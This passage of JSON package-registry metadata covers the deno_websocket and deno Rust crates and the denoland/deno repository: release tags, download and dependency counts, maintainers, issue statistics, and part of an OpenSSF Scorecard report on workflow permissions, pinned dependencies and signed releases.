,{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-15T12:40:55.799Z","dependent_packages_count":16,"downloads":712810,"downloads_period":"total","dependent_repos_count":40,"rankings":{"downloads":4.9443896313570725,"dependent_repos_count":4.642015927019853,"dependent_packages_count":2.471397592163314,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.148574472443382},"purl":"pkg:cargo/deno_websocket","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_websocket","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_websocket","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_websocket/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-15T06:21:26.247Z","issues_count":6571,"pull_requests_count":9583,"avg_time_to_close_issue":17247523.67787189,"avg_time_to_close_pull_request":1538059.59631994,"issues_closed_count":3776,"pull_requests_closed_count":7988,"pull_request_authors_count":562,"issue_authors_count":2451,"avg_comments_per_issue":2.512707350479379,"avg_comments_per_pull_request":0.7153292288427423,"merged_pull_requests_count":6973,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":657,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1387895.1889400922,"past_year_avg_time_to_close_pull_request":1314632.8532110092,"past_year_issues_closed_count":217,"past_year_pull_requests_closed_count":654,"past_year_pull_request_authors_count":170,"past_year_issue_authors_count":367,"past_year_avg_comments_per_issue":1.2146118721461188,"past_year_avg_comments_per_pull_request":1.0591174021648626,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":481,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1776,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":672,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":277,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"dsherret","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":39,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:39.217Z","updated_at":"2022-11-07T18:29:39.217Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:24.531Z","updated_at":"2023-07-18T22:41:24.531Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":1080036,"name":"deno","ecosystem":"cargo","description":"Provides the deno executable","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":347,"first_release_published_at":"2018-09-12T19:43:32.347Z","latest_release_published_at":"2026-08-27T15:26:38.302Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-01T12:16:23.499Z","created_at":"2022-04-07T21:02:23.987Z","updated_at":"2026-09-01T19:17:26.902Z","registry_url":"https://crates.io/crates/deno/","install_command":"cargo install deno","documentation_url":"https://docs.rs/deno/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using 